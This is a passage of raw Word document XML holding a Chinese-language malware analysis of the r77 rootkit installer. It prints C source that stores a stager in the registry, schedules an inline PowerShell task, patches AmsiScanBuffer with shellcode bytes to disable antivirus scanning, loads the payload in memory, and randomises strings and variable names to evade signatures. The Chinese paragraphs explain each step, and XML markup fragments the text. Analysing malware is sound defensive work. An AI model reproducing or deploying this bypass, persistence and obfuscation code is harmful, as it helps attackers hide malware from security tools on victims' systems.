        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="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R77代码分析：</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="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Install.c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"Install.h"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"resource.h"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"r77def.h"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"r77win.h"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&lt;wchar.h&gt;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&lt;Shlwapi.h&gt;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Get stager executable from resources.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LPBYTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> stager;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stagerSize;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(!GetResource(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>IDR_STAGER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"EXE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, &amp;stager, &amp;stagerSize))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Write stager executable to registry.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This C# executable is compiled with AnyCPU and can be run by both 32-bit and 64-bit powershell.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The target framework is 3.5, but it will run, even if .NET 4.x is installed and .NET 3.5 isn't.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HKEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> key;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(RegOpenKeyExW(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HKEY_LOCAL_MACHINE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L"SOFTWARE"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>KEY_ALL_ACCESS</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KEY_WOW64_64KEY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, &amp;key) != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS</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RegSetValueExW(key, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>HIDE_PREFIX</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L"stager"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, 0, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>REG_BINARY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve">, stager, stagerSize) != </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>ERROR_SUCCESS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This powershell command loads the stager from the registry and executes it in memory using Assembly.Load().EntryPoint.Invoke()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The C# binary will proceed with creating a native process using process hollowing.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The powershell command is purely inline and doesn't require a ps1 file.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powershellCommand = GetPowershellCommand();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Create scheduled task to run the powershell stager.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DeleteScheduledTask(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>R77_SERVICE_NAME32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DeleteScheduledTask(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>R77_SERVICE_NAME64</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LPCWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> scheduledTaskName = Is64BitOperatingSystem() ? </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>R77_SERVICE_NAME64</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R77_SERVICE_NAME32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(CreateScheduledTask(scheduledTaskName, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L""</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L"powershell"</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, powershellCommand))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RunScheduledTask(scheduledTaskName);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GetPowershellCommand()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Powershell inline command to be invoked using powershell.exe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PWCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> command = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NEW_ARRAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 16384);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StrCpyW(command,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AMSI bypass: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[Reflection.Assembly]::Load triggers AMSI and the byte[] with Stager.exe is passed to AV for analysis.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AMSI must be disabled for the entire process, because both powershell and .NET itself implement AMSI.</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AMSI is only supported on Windows 10; AMSI bypass not required for Windows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(IsAtLeastWindows10())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Patch amsi.dll!AmsiScanBuffer prior to [Reflection.Assembly]::Load.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Do not use Add-Type, because it will invoke csc.exe and compile a C# DLL to disk.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StrCatW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Function to create a Delegate from an IntPtr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L"function Local:Get-Delegate{"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L"Param("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L"[OutputType([Type])]"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L"[Parameter(Position=0)][Type[]]$ParameterTypes,"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L"[Parameter(Position=1)][Type]$ReturnType"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L"$TypeBuilder=[AppDomain]::CurrentDomain"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L".DefineDynamicAssembly((New-Object Reflection.AssemblyName(`ReflectedDelegate`)),[Reflection.Emit.AssemblyBuilderAccess]::Run)"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L".DefineDynamicModule(`InMemoryModule`,$False)"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L".DefineType(`MyDelegateType`,`Class,Public,Sealed,AnsiClass,AutoClass`,[MulticastDelegate]);"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L"$TypeBuilder.DefineConstructor(`RTSpecialName,HideBySig,Public`,[Reflection.CallingConventions]::Standard,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);"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L"$TypeBuilder.DefineMethod(`Invoke`,`Public,HideBySig,NewSlot,Virtual`,$ReturnType,$ParameterTypes).SetImplementationFlags(`Runtime,Managed`);"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L"Write-Output $TypeBuilder.CreateType();"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Use Microsoft.Win32.UnsafeNativeMethods for some DllImport's.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L"$NativeMethods=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\\')[-1].Equals(`System.dll`)})"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L".GetType(`Microsoft.Win32.UnsafeNativeMethods`);"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L"$GetProcAddress=$NativeMethods.GetMethod(`GetProcAddress`,[Reflection.BindingFlags](`Public,Static`),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);"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Create delegate types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L"$LoadLibraryDelegate=Get-Delegate @([String])([IntPtr]);"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L"$VirtualProtectDelegate=Get-Delegate @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);"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Get DLL and function pointers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L"$Kernel32Ptr=$NativeMethods.GetMethod(`GetModuleHandle`).Invoke($Null,@([Object](`kernel32.dll`)));"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L"$LoadLibraryPtr=$GetProcAddress.Invoke($Null,@([Object]$Kernel32Ptr,[Object](`LoadLibraryA`)));"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L"$VirtualProtectPtr=$GetProcAddress.Invoke($Null,@([Object]$Kernel32Ptr,[Object](`VirtualProtect`)));"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L"$AmsiPtr=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($LoadLibraryPtr,$LoadLibraryDelegate).Invoke(`amsi.dll`);"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Get address of AmsiScanBuffer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L"$AmsiScanBufferPtr=$GetProcAddress.Invoke($Null,@([Object]$AmsiPtr,[Object](`AmsiScanBuffer`)));"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VirtualProtect PAGE_READWRITE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L"$OldProtect=0;"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L"[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBufferPtr,[uint32]8,4,[ref]$OldProtect);"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Overwrite AmsiScanBuffer function with shellcode to return AMSI_RESULT_CLEAN.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(Is64BitOperatingSystem())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b8 57 00 07 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mov</w:t>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eax, 0x80070057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c3</w:t>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ret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StrCatW(command, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L"[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$AmsiScanBufferPtr,6);"</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b8 57 00 07 80</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:tab/>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="008000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>mov</w:t>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eax, 0x80070057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c2 18 00</w:t>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ret</w:t>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0x18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StrCatW(command, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L"[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc2,0x18,0),0,$AmsiScanBufferPtr,8);"</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VirtualProtect PAGE_EXECUTE_READ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StrCatW(command, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L"[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($VirtualProtectPtr,$VirtualProtectDelegate).Invoke($AmsiScanBufferPtr,[uint32]8,0x20,[ref]$OldProtect);"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Load Stager.exe from registry and invoke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StrCatW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L"[Reflection.Assembly]::Load"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L"[Microsoft.Win32.Registry]::LocalMachine"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L".OpenSubkey(`SOFTWARE`)"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L".GetValue(`"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HIDE_PREFIX</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L"stager`)"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L".EntryPoint"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L".Invoke($Null,$Null)"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StrCatW(command,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Replace string literals that are marked with `thestring`.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ObfuscatePowershellStringLiterals(command);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Obfuscate all variable names with random strings.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L"Get-Delegate"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L"ParameterTypes"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L"ReturnType"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L"TypeBuilder"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L"NativeMethods"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L"GetProcAddress"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L"LoadLibraryDelegate"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L"VirtualProtectDelegate"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L"Kernel32Ptr"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L"LoadLibraryPtr"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L"VirtualProtectPtr"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L"AmsiPtr"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L"AmsiScanBufferPtr"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ObfuscatePowershellVariable(command, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>L"OldProtect"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代码的主要目的是构建一个PowerShell命令，并对其进行一些绕过技术和混淆操作，以绕过安全机制。</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下面是代码的主要功能和步骤的分析：</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首先，函数分配了一个16384字节大小的内存块，用于存储构建的PowerShell命令。</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接下来，代码检查操作系统版本，如果是Windows 10及以上版本，则执行以下操作：</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构建一个PowerShell命令，用于绕过AMSI（Antimalware Scan Interface）检测。这部分代码使用PowerShell的反射功能，创建了一个代理类型（Delegate），并获取了一些DLL和函数的指针，用于后续的操作。</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通过调用GetProcAddress函数获取了amsi.dll中AmsiScanBuffer函数的地址，并保存到变量$AmsiScanBufferPtr中。</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使用VirtualProtect函数将AmsiScanBuffer函数的内存页属性更改为PAGE_READWRITE，以便后续修改函数的内容。</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根据操作系统位数，将一段Shellcode写入AmsiScanBuffer函数的内存地址，用于绕过AMSI检测。Shellcode的内容是将EAX寄存器设置为0x80070057，然后返回。</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使用VirtualProtect函数将AmsiScanBuffer函数的内存页属性更改为PAGE_EXECUTE_READ，以恢复原始属性。</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然后，代码从注册表中获取一个名为"HIDE_PREFIXstager"的值，该值应该是一个可执行程序（Stager.exe）的路径。然后，使用Reflection.Assembly.Load方法加载该程序集，并调用其EntryPoint方法来执行Stager.exe。</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接下来，代码调用了两个自定义函数ObfuscatePowershellStringLiterals和ObfuscatePowershellVariable，对构建的PowerShell命令进行了字符串混淆和变量名混淆。</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>
        <w:widowControl/>
        <w:spacing w:line="360" w:lineRule="auto"/>
        <w:ind w:left="0" w:leftChars="0" w:firstLine="0" w:firstLineChars="0"/>
        <w:jc w:val="left"/>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="宋体" w:hAnsi="宋体" w:eastAsia="宋体"/>
          <w:b w:val="0"/>
          <w:bCs w:val="0"/>
          <w:sz w:val="21"/>
          <w:szCs w:val="21"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="8"/>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最后，函数返回构建的PowerShell命令的字符串指针。</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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObfuscatePowershellVariable(</w:t>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command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LPCWSTR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variableName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length = lstrlenW(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>variableName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WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> newName[100];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Replace all ocurrences of a specified variable name with a randomized string of the same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(GetRandomString(newName,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ocurrence; ocurrence = StrStrIW(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>command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variableName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i_wmemcpy</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(ocurrence, newName,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这段代码是一个函数，用于对PowerShell命令中的变量名进行混淆操作。函数接受两个参数：一个LPWSTR类型的指针command，指向存储PowerShell命令的字符串；一个LPCWSTR类型的指针variableName，指向要混淆的变量名。</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以下是代码的主要功能和步骤的分析：</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首先，函数获取要混淆的变量名的长度，使用lstrlenW函数获取变量名字符串的长度，并将结果保存在length变量中。</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然后，函数声明一个名为newName的WCHAR类型的数组，用于存储混淆后的变量名。</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接下来，函数调用一个名为GetRandomString的函数，将混淆后的变量名存储到newName数组中。GetRandomString函数的具体实现未在提供的代码段中给出，可能是一个自定义的函数，用于生成指定长度的随机字符串。</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如果成功生成了混淆后的变量名，函数进入一个循环，使用StrStrIW函数在command字符串中查找变量名的出现位置。StrStrIW函数是一个字符串查找函数，不区分大小写。</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在循环中，每次找到变量名的出现位置，函数使用i_wmemcpy函数将newName数组中的混淆后的变量名复制到命令字符串中，替换原始的变量名。i_wmemcpy函数用于在宽字符字符串之间进行内存复制。</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总结来说，这段代码的作用是将PowerShell命令中指定的变量名替换为相同长度的随机字符串，以达到混淆变量名的目的。这种混淆操作可以增加代码的复杂性和可读性，使恶意代码更难以分析和理解。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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>VOID</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> ObfuscatePowershellStringLiterals(</w:t>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command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Replace all string literals like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`thestring`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with something like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't'+[Char]123+[Char]45+'s'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Polymorphic modifications of strings is required, because something static like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'ams'+'i.dll'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will eventually end up in a list of known signatures.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PWCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> newCommand = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NEW_ARRAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 16384);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i_wmemset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(newCommand, 0, 16384);</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LPBYTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> random = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>NEW_ARRAY</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="2B91AF"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>BYTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>, 16384);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(!GetRandomBytes(random, 16384))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commandPtr = </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="808080"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>command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LPBYTE</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> randomPtr = random;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beginQuote; beginQuote = StrStrIW(commandPtr,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LPWSTR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> endQuote = StrStrIW(&amp;beginQuote[1],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textLength = beginQuote - commandPtr;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stringLength = endQuote - beginQuote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beginQuote   endQuote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v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.Invoke(`amsi.dll`);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              &lt;-- textLength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     &lt;-- stringLength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Append what's before the beginning quote.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StrNCatW(newCommand, commandPtr, textLength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Append beginning quote.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StrCatW(newCommand,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Append each character using a different obfuscation technique.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DWORD</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> i = 0; i &lt; stringLength;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WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> c = beginQuote[i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WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> charNumber[10];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Int32ToStrW(c, charNumber);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WCHAR</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t xml:space="preserve"> obfuscatedChar[20];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6F008A"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>i_wmemset</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="000000"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
        <w:t>(obfuscatedChar, 0, 20);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Randomly choose an obfuscation technique.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((*randomPtr++) &amp;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Put char as literal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obfuscatedChar[0]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Put char as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StrCatW(obfuscatedChar,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StrNCatW(obfuscatedChar, &amp;c,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StrCatW(obfuscatedChar,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Put char as '+[Char](123)+'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StrCatW(obfuscatedChar, </w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia" w:ascii="新宋体" w:hAnsi="新宋体" w:eastAsia="新宋体"/>
          <w:color w:val="A31515"/>
          <w:sz w:val="19"/>
          <w:szCs w:val="24"/>
        </w:rPr>
